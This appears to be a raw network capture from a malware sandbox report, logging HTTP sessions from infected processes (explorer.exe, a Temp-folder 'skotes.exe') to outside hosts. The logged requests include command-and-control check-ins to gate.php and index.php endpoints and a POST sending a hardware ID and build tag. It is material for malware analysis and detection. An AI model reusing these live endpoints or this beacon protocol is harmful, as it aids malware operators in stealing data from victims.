                                                                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 15:50:17 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: 1 0


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        107192.168.2.1050195185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:16.950519085 CET283OUTPOST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:17.071221113 CET6OUTData Raw: 45 5b 58 05
                                                                                                                                                                                                                                                                                        Data Ascii: E[X
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:18.684222937 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 23:50:17 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        108192.168.2.1050196185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:18.924328089 CET283OUTPOST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:19.044986963 CET6OUTData Raw: 45 5b 58 05
                                                                                                                                                                                                                                                                                        Data Ascii: E[X
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:20.618472099 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 23:50:19 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        109192.168.2.1050200185.215.113.43807820C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:19.439105988 CET306OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                        Host: 185.215.113.43
                                                                                                                                                                                                                                                                                        Content-Length: 152
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 45 37 37 42 30 35 42 38 32 44 31 32 46 43 30 37 44 42 32 33 39 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39
                                                                                                                                                                                                                                                                                        Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B12E77B05B82D12FC07DB239B96DA0445166EF7A7D35B1E750864299
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:20.792407990 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 15:50:20 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        110192.168.2.1050202185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:20.863734961 CET283OUTPOST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:20.988187075 CET6OUTData Raw: 45 5b 58 05
                                                                                                                                                                                                                                                                                        Data Ascii: E[X
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:22.514848948 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 23:50:21 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        111192.168.2.1050205185.215.113.20680
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:21.882158995 CET90OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.215.113.206
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:23.197885036 CET203INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 15:50:22 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:23.750991106 CET413OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----BKKKFCFIIJJKKFHIEHJK
                                                                                                                                                                                                                                                                                        Host: 185.215.113.206
                                                                                                                                                                                                                                                                                        Content-Length: 211
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Data Raw: 2d 2d 2d 2d 2d 2d 42 4b 4b 4b 46 43 46 49 49 4a 4a 4b 4b 46 48 49 45 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 44 42 33 41 36 39 44 41 41 36 45 32 33 37 31 35 34 33 35 31 30 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4b 4b 46 43 46 49 49 4a 4a 4b 4b 46 48 49 45 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4b 4b 46 43 46 49 49 4a 4a 4b 4b 46 48 49 45 48 4a 4b 2d 2d 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: ------BKKKFCFIIJJKKFHIEHJKContent-Disposition: form-data; name="hwid"2DB3A69DAA6E2371543510------BKKKFCFIIJJKKFHIEHJKContent-Disposition: form-data; name="build"stok------BKKKFCFIIJJKKFHIEHJK--
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:24.196363926 CET210INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 15:50:23 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                        Content-Length: 8
                                                                                                                                                                                                                                                                                        Keep-Alive: timeout=5, max=99
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Data Raw: 59 6d 78 76 59 32 73 3d
                                                                                                                                                                                                                                                                                        Data Ascii: YmxvY2s=


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        112192.168.2.1050207185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:22.763206959 CET283OUTPOST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:22.890925884 CET6OUTData Raw: 45 5b 58 05
                                                                                                                                                                                                                                                                                        Data Ascii: E[X
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:24.507292986 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 23:50:23 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        113192.168.2.1050209185.215.113.43807820C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:22.942434072 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                        Host: 185.215.113.43
                                                                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:24.260996103 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 15:50:24 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: 1 0


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        114192.168.2.105021134.107.221.8280
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:23.195369959 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:24.281846046 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                        Content-Length: 90
                                                                                                                                                                                                                                                                                        Via: 1.1 google
                                                                                                                                                                                                                                                                                        Date: Wed, 11 Dec 2024 18:55:58 GMT
                                                                                                                                                                                                                                                                                        Age: 75266
                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                        Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                        Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                                                        Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:24.972543001 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:25.288101912 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                        Content-Length: 90
                                                                                                                                                                                                                                                                                        Via: 1.1 google
                                                                                                                                                                                                                                                                                        Date: Wed, 11 Dec 2024 18:55:58 GMT
                                                                                                                                                                                                                                                                                        Age: 75267
                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                        Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                        Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                                                        Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:25.636627913 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:25.951195955 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                        Content-Length: 90
                                                                                                                                                                                                                                                                                        Via: 1.1 google
                                                                                                                                                                                                                                                                                        Date: Wed, 11 Dec 2024 18:55:58 GMT
                                                                                                                                                                                                                                                                                        Age: 75267
                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                        Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                        Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                                                        Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:26.396147013 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:26.711131096 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                        Content-Length: 90
                                                                                                                                                                                                                                                                                        Via: 1.1 google
                                                                                                                                                                                                                                                                                        Date: Wed, 11 Dec 2024 18:55:58 GMT
                                                                                                                                                                                                                                                                                        Age: 75268
                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                        Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                        Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                                                        Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:26.946046114 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:27.261884928 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                        Content-Length: 90
                                                                                                                                                                                                                                                                                        Via: 1.1 google
                                                                                                                                                                                                                                                                                        Date: Wed, 11 Dec 2024 18:55:58 GMT
                                                                                                                                                                                                                                                                                        Age: 75269
                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                        Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                        Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                                                        Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:27.595668077 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:27.910432100 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                        Content-Length: 90
                                                                                                                                                                                                                                                                                        Via: 1.1 google
                                                                                                                                                                                                                                                                                        Date: Wed, 11 Dec 2024 18:55:58 GMT
                                                                                                                                                                                                                                                                                        Age: 75269
                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                        Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                        Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                                                        Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:29.005345106 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:29.319724083 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                        Content-Length: 90
                                                                                                                                                                                                                                                                                        Via: 1.1 google
                                                                                                                                                                                                                                                                                        Date: Wed, 11 Dec 2024 18:55:58 GMT
                                                                                                                                                                                                                                                                                        Age: 75271
                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                        Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                        Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                                                        Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:32.377999067 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:32.694256067 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                        Content-Length: 90
                                                                                                                                                                                                                                                                                        Via: 1.1 google
                                                                                                                                                                                                                                                                                        Date: Wed, 11 Dec 2024 18:55:58 GMT
                                                                                                                                                                                                                                                                                        Age: 75274
                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                        Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                        Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                                                        Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:42.881143093 CET6OUTData Raw: 00
                                                                                                                                                                                                                                                                                        Data Ascii:
